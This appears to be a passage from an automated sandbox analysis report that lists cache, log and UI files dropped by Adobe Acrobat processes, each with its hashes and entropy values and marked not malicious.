SHA-512: | 382DC902C7C9196D147D04FC1A8BDC718A2D614756ED7A4F72B19093FDB3AE6419F7D87CDE5E912CE73E81924A4C296E6556D5B300118BC82D45857D29BF9894 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.158209831489318 |
Encrypted: | false |
SSDEEP: | 6:iO4qVRFIOq2PFi2nKuAl9OmbnIFUtSqVot+ZmwsqVotykwOFi2nKuAl9OmbjLJ:7nRFIOvdZHAahFUtZx/Lr5wZHAaSJ |
MD5: | 51E77A484DFBDFF168AE7D97C80178F9 |
SHA1: | 515B28C89590D336491CC7A01A7E3D8DF677967F |
SHA-256: | D614F2595992D1A9D5FF3588B84391706DEFEB471D21A725F597CE3FC9031945 |
SHA-512: | 880C1207F0A7C8A169370D163415A6984A13C9EF59ACED52ABE4D9B1F92875375B50148F05A92F4039ED30F4FB1A7348F3AC5DAD0AB89DB6E16645557913839E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.158209831489318 |
Encrypted: | false |
SSDEEP: | 6:iO4qVRFIOq2PFi2nKuAl9OmbnIFUtSqVot+ZmwsqVotykwOFi2nKuAl9OmbjLJ:7nRFIOvdZHAahFUtZx/Lr5wZHAaSJ |
MD5: | 51E77A484DFBDFF168AE7D97C80178F9 |
SHA1: | 515B28C89590D336491CC7A01A7E3D8DF677967F |
SHA-256: | D614F2595992D1A9D5FF3588B84391706DEFEB471D21A725F597CE3FC9031945 |
SHA-512: | 880C1207F0A7C8A169370D163415A6984A13C9EF59ACED52ABE4D9B1F92875375B50148F05A92F4039ED30F4FB1A7348F3AC5DAD0AB89DB6E16645557913839E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.117097060768055 |
Encrypted: | false |
SSDEEP: | 6:iO4qVV1yq2PFi2nKuAl9Ombzo2jMGIFUtSqVjj1ZmwsqVj1RkwOFi2nKuAl9OmbX:7nV4vdZHAa8uFUtZjj1/LjD5wZHAa8RJ |
MD5: | 69B540F3B09C79CDC4827ED9F1D0AB99 |
SHA1: | E7F1B828253D1464A283D12C4CA678579EAB7F5D |
SHA-256: | FAB2176ABE864AE193C3CE998988181197F57574B9BAEC4FB054127241FB59C0 |
SHA-512: | D69A2B8AC554C656CD699B8E5FEC2C205BCD0044E3773EB78955CBD4F875E1AF047044BFC9A04D3EF5B2E21B8F94FBB36A38D41484E10116659D9CFA9B5E6F5D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.117097060768055 |
Encrypted: | false |
SSDEEP: | 6:iO4qVV1yq2PFi2nKuAl9Ombzo2jMGIFUtSqVjj1ZmwsqVj1RkwOFi2nKuAl9OmbX:7nV4vdZHAa8uFUtZjj1/LjD5wZHAa8RJ |
MD5: | 69B540F3B09C79CDC4827ED9F1D0AB99 |
SHA1: | E7F1B828253D1464A283D12C4CA678579EAB7F5D |
SHA-256: | FAB2176ABE864AE193C3CE998988181197F57574B9BAEC4FB054127241FB59C0 |
SHA-512: | D69A2B8AC554C656CD699B8E5FEC2C205BCD0044E3773EB78955CBD4F875E1AF047044BFC9A04D3EF5B2E21B8F94FBB36A38D41484E10116659D9CFA9B5E6F5D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\4369bcbf-a7ce-4b4e-8cfb-3f27e035ceae.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 476 |
Entropy (8bit): | 4.977442727596645 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqChsBdOg2Hp2caq3QYiubpP7E4T3y:Y2sRdsJydMHr3QYhbd7nby |
MD5: | 3F85AB5A077E00734B5D5E8E51321477 |
SHA1: | C113E58716537B50515187608AEC52603503F1B8 |
SHA-256: | 8CDF11863969CE7543D55B69FD69EBCEEE6C6CFA278552DF90F9FA6793D9A8DE |
SHA-512: | C7457E37D3C9278D456A2B37CB83E366E59DA7FA180A7F45244BDFB03F0E16399DE4677696D8596514080E17FBED8C8663D5F478207016C6E2C1D7286FE180A9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 476 |
Entropy (8bit): | 4.977442727596645 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqChsBdOg2Hp2caq3QYiubpP7E4T3y:Y2sRdsJydMHr3QYhbd7nby |
MD5: | 3F85AB5A077E00734B5D5E8E51321477 |
SHA1: | C113E58716537B50515187608AEC52603503F1B8 |
SHA-256: | 8CDF11863969CE7543D55B69FD69EBCEEE6C6CFA278552DF90F9FA6793D9A8DE |
SHA-512: | C7457E37D3C9278D456A2B37CB83E366E59DA7FA180A7F45244BDFB03F0E16399DE4677696D8596514080E17FBED8C8663D5F478207016C6E2C1D7286FE180A9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3878 |
Entropy (8bit): | 5.232810845743178 |
Encrypted: | false |
SSDEEP: | 96:wshFT0h7cA4YC2EVPCqY35NEmNOYcGPtqKYSEVnOYih/:wshFT0h7cZb2EVKZPEANcGIK5EVnOYip |
MD5: | C94239B8F11E9580C2703C9DD184583C |
SHA1: | 2C684478445820DDC5B4BACAC0BBEFD2641A5CA7 |
SHA-256: | A97EDD567FEF01CE2F8CB6D8847FC2DFF06E4C0468C358221680CF528E7ADC40 |
SHA-512: | 26F860B77ECA94A0D089BE7B0939ACEF3F308040D7315D2682F8DEF09FF675952C34F470AFF5B6D4C8A85467ACFFF1CF8497C26041FAF3F2A8787A4D8CB8B189 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.114985571413878 |
Encrypted: | false |
SSDEEP: | 6:iO4qVuLL51yq2PFi2nKuAl9OmbzNMxIFUtSqVuLLUj1ZmwsqVuLLUq1RkwOFi2nv:7nuX54vdZHAa8jFUtZuXUj1/LuXUqD5Q |
MD5: | 7E960CB6B078C9B8AB70BF7BB7CF7DFD |
SHA1: | 4709BE23E551243CC26EAC06CE1E60379A6F5548 |
SHA-256: | 68BA4D31B4D0A3F8CFED0CC043D21F3C0D7AE910B4D3BADCF0F8AFBE0C8A21BB |
SHA-512: | 307195E1C0F3C9E147700ACB035EA6AF1B0BAA1DE93EE3C6FFB98F59EEA991BB9697C348E0A1353EE8B944E7F8B65A001B0272DFD9B79AD403FC6DC74FCDE21C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.114985571413878 |
Encrypted: | false |
SSDEEP: | 6:iO4qVuLL51yq2PFi2nKuAl9OmbzNMxIFUtSqVuLLUj1ZmwsqVuLLUq1RkwOFi2nv:7nuX54vdZHAa8jFUtZuXUj1/LuXUqD5Q |
MD5: | 7E960CB6B078C9B8AB70BF7BB7CF7DFD |
SHA1: | 4709BE23E551243CC26EAC06CE1E60379A6F5548 |
SHA-256: | 68BA4D31B4D0A3F8CFED0CC043D21F3C0D7AE910B4D3BADCF0F8AFBE0C8A21BB |
SHA-512: | 307195E1C0F3C9E147700ACB035EA6AF1B0BAA1DE93EE3C6FFB98F59EEA991BB9697C348E0A1353EE8B944E7F8B65A001B0272DFD9B79AD403FC6DC74FCDE21C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.43824982476428 |
Encrypted: | false |
SSDEEP: | 384:SeBci5GUiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:OYurVgazUpUTTGt |
MD5: | 5B29A30CEECBCA652EAC945DAA3FF7C8 |
SHA1: | 905718B32B379A0BC87010291615CA5C2DAED6C0 |
SHA-256: | B5DF643B443DFC00B1E05F57F4BA77A6E81ECED25A23318A3A4E9407993687CC |
SHA-512: | 1B2AF05584E9BD37461C881E12371E46EFA793A08987C003E4DC84E96C9D1AD61BBB77F5D4FA2C3FC97DB3954896BB98567320915EE7BFE3FA6529E492B7CE12 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2160219319124304 |
Encrypted: | false |
SSDEEP: | 24:7+tKrm6wK9qLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Md:7MK6W9qvmFTIF3XmHjBoGGR+jMz+LhM |
MD5: | E982C8B03616DE0B1DD82C5E97E2ECC7 |
SHA1: | 2E82663B249A057BB865FC64FF37CF9C0E114E38 |
SHA-256: | 30567619AAA8FB77ADC06320D13673013165FCD844F914D55B77AD84E6F9ED74 |
SHA-512: | 01332307A021F3D638926F4AB87AF7C997D0A9B3E2CA7103A3748B2FAD50D1A3280F7C9C0F123E8D30601AFFB08445D9B0BC1C266F22A37DC08811BCCDE0C55B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFklr+S1ltfllXlE/HT8kwh/tNNX8RolJuRdxLlGB9lQRYwpDdt:kKtSveT8zRNMa8RdWBwRd |
MD5: | 6BD64A34D7F77C94B483C8EF0F600E48 |
SHA1: | 1310A4C19083D3C6A3EE2C080B261FA2CC3ADB28 |
SHA-256: | AAD35AFC3298D189EE768FE024837E06F5D4EE7B159B1C068BC206CBEE166B83 |
SHA-512: | C0B64822E44C0C0632DF702F4E8410244DF4D25A77FF81D91F11FA332B3C9F72EDF634C497A8827B2EA479F980566098C07EB49F83D44B07F36D1471EC82E318 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.242990426783058 |
Encrypted: | false |
SSDEEP: | 6:kK5sL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:KiDImsLNkPlE99SNxAhUe/3 |
MD5: | BC722C692F80D8FBE0F936FA5636CF88 |
SHA1: | 95AF3101A4F558B238CE628DDCDC0A8802385439 |
SHA-256: | 21B2AD869FC04A11F41CEA50F3C7887D6737D0933A8D05DD0D92D8B581670C89 |
SHA-512: | F7A2F32DE3F49DED4E0406842E44A9C01E667BCC6F6AE86FE74516BADA8B2C668537E53DD02CC251664EE6F23124E139E6421E5E1961CC3E7BFE005CE7BE777D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.344870993419948 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHERDKzaT/v12UXjb24kF0Y5DoAvJM3g98kUwPeUkwRe9:YvXKXYYY/d2UTbdWsGMbLUkee9 |
MD5: | 4008121C838783727582CA8433AF594C |
SHA1: | 86FFFC54B9924A64EF26C00188778CCC84291C63 |
SHA-256: | E3A718F55B629DFFA9A8C54718B81313B404E60C8133E6A69C5AB4BCF7B7CECB |
SHA-512: | E219A0FCC0CC12CC19D624A4CA2E9AAD12373F3D86F7B74CFEB2CC8D9CED3E405FF833EBC0749BF95AE6586DA52B74768D13ED1630709F087E9F710042F5FC49 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.284973121772637 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHERDKzaT/v12UXjb24kF0Y5DoAvJfBoTfXpnrPeUkwRe9:YvXKXYYY/d2UTbdWsGWTfXcUkee9 |
MD5: | 5B723977636AAC2E906322831033D9D8 |
SHA1: | 00C1678EF5C96ADF928A38CF2A81E2749D912D19 |
SHA-256: | 12D9FAE7E222649D9305C32779F1658A1C877E801DE4B8F9FAB0D06F18B1FAF7 |
SHA-512: | DD3B33E367E4B79BC60896C73AF997B5AA1229828CB926A26AACD7CCA147B3D12DAA52C8B4EDE8D472448F7F702CDCD54EAFB7D6ADF7802A344692F30E007363 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.263679335999515 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHERDKzaT/v12UXjb24kF0Y5DoAvJfBD2G6UpnrPeUkwRe9:YvXKXYYY/d2UTbdWsGR22cUkee9 |
MD5: | 633FBA9BD7B460C4F43092E0BD23EE0B |
SHA1: | CE583C5F08AFC5175B80B976C6D071337BBE112D |
SHA-256: | 3D423A829D7E59F2E2CB3DA1BB56F804F163AA1329492572672183C3F88B58AF |
SHA-512: | 2C841BFF16A3DB0ED3ADA5D6F4B8D610222403FED5B504A6CEA5CF2B2FC2D6978CC72F8A0CEF879C13B862A168BED3AAF4C55C7E3757906E90EACF874F52761E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.318500847417757 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHERDKzaT/v12UXjb24kF0Y5DoAvJfPmwrPeUkwRe9:YvXKXYYY/d2UTbdWsGH56Ukee9 |
MD5: | 479E66852D01A37FD690755E7A35C35D |
SHA1: | 669BD4D4941B0A50253CF6D07FC51653E54A2583 |
SHA-256: | 4A3D1E7901F73A8BD7B760B7FF63F8B1B93CF07ED8F7C48E14BCDA47DC690555 |
SHA-512: | 1D1FE642490E3BBED04A188699A827A2815115E9F862856A5A5B8757C372C9E19A24B6E41C933EC37084DC9FB575B6F5B309C3CEC1279609C44C5D5CD331B068 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.6891860955174876 |
Encrypted: | false |
SSDEEP: | 24:Yv6XVUXoJpLgE9cQx8LennAvzBvkn0RCmK8czOCCSy1:YvAwoJhgy6SAFv5Ah8cv/y1 |
MD5: | 4D260FD83575E1CA97C9D67532D3487B |
SHA1: | C74DCD4FD3CED1D30AA42B25ABC2499187870160 |
SHA-256: | C26F68F1C6A0E68988DFDF5CEF19D74D1E299CA96C6138B7B6656B3D367B5649 |
SHA-512: | BC78DA0E346F6439CD8DAB2FBDD2C7F0EFF5CC0931EDFABA7B87ABBE1ECBB07A775F2CE643F46BE235AF384A0EE9B993055F5B858B6CA9488D90B23425A76375 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.260998900152557 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHERDKzaT/v12UXjb24kF0Y5DoAvJf8dPeUkwRe9:YvXKXYYY/d2UTbdWsGU8Ukee9 |
MD5: | 67FA44E4445F4EA9A015231B920CB5B5 |
SHA1: | 5BAFA82966AA521135BD1BE3B1A0C9F8D87C412A |
SHA-256: | AEBE7512D996EB2384A388384AE53FFBD340CA0925E7ABCAC0B0DFAE64575F1F |
SHA-512: | 8878C9FCCF5E35AF38E1FC8E8844905256D7C0820A2383120B99CC190F2956BA069F900354E6B8A8D7B6986D1D3F3EE82CD148BF27FD1F69A11D36AC8B42C928 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.264342647922071 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHERDKzaT/v12UXjb24kF0Y5DoAvJfQ1rPeUkwRe9:YvXKXYYY/d2UTbdWsGY16Ukee9 |
MD5: | 260DC219157936402DAE0B8DAC5ACE64 |
SHA1: | A1911FAA7DE5B573A6B3F3FAAF10547EEBF9F431 |
SHA-256: | BD5F704C8578E6FFECAAF2384B430A14790FB50E13EA4E2CD9CAD04C15000089 |
SHA-512: | 63040792811E9B4391F09E67DEC2C3AAF32768A8F8FF1FF2A16C232B36E533CECC5CEC93D37919B129C7EB9E3311514A2AD5F2588043248BCFE6F908F44C4116 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.274044821942691 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHERDKzaT/v12UXjb24kF0Y5DoAvJfFldPeUkwRe9:YvXKXYYY/d2UTbdWsGz8Ukee9 |
MD5: | 0E3155A50BA9AFF8FD838B99357BEC2B |
SHA1: | 6A3A0D36EEF676780FC05F90AAA99310EC6342B5 |
SHA-256: | 91893D38C93D8363AE8A55F99ADD35FC44231AD6EFB312697B4CB686146660BF |
SHA-512: | 7F66D051BE5D7399F35F2AAABB77EAA770B6F1ED004E35FA8F4EFC47B58CC31EECAB65CBE8C20E05E4499DF8869DF6A9562C0C146C657B1059E5EBDE4E020ACA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.287722172715741 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHERDKzaT/v12UXjb24kF0Y5DoAvJfzdPeUkwRe9:YvXKXYYY/d2UTbdWsGb8Ukee9 |
MD5: | B91393D7E3F0AF5C24DCD5FE308111AC |
SHA1: | FEFC618923ADFC93D89C3A72B9BE8D22407825B0 |
SHA-256: | AA6A609ACBC3B5ED0360DEB3E474B4D03A7CF0E811BF6017F0464EAF550B7F27 |
SHA-512: | 65AC3B4698D46986B8BC82EC0D2895412279F9946D78B93914C15F07DCFB2B48524ED3899DDBF017ABB9348BEB975CB05E51A924CF8FC8813E16DB8016D59002 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.267708999609783 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHERDKzaT/v12UXjb24kF0Y5DoAvJfYdPeUkwRe9:YvXKXYYY/d2UTbdWsGg8Ukee9 |
MD5: | 9C4910A98E3734A33809005643A8C7D2 |
SHA1: | 2FE05CBC533842DD858D6731EC686279BCD053C6 |
SHA-256: | 5AE55C1A0DF48F6C3B105A64369E0C6DDE5F9B847CF0336A745FE2A0C3E2FF5D |
SHA-512: | D08042B313CD8175BBE4792456342495020CA719D4B0A4FDC3CAF77E43389B4CB7CFCD395A0DB7CA9436E97E5C766526F54A9E27E28BC6E2C71392B02FA17270 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.25319086890466 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHERDKzaT/v12UXjb24kF0Y5DoAvJf+dPeUkwRe9:YvXKXYYY/d2UTbdWsG28Ukee9 |
MD5: | A0E29B6726F0570ECA88F14B0802EF5A |
SHA1: | 385D3E7CC79DBC03EF2BABB6C253EBAD62CF8276 |
SHA-256: | 39F2C33F184BC20C69F99FE7BEE5C503E7C34FB3A595E4ECBCE88D372D880C78 |
SHA-512: | F25E82491D946959F688F68F965799146C4A44095E8BBCCD76E5861A5532A08600C86152AFCFF1E82EE62E365311817C28F224499A38316DE649EF8AB020AB0B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
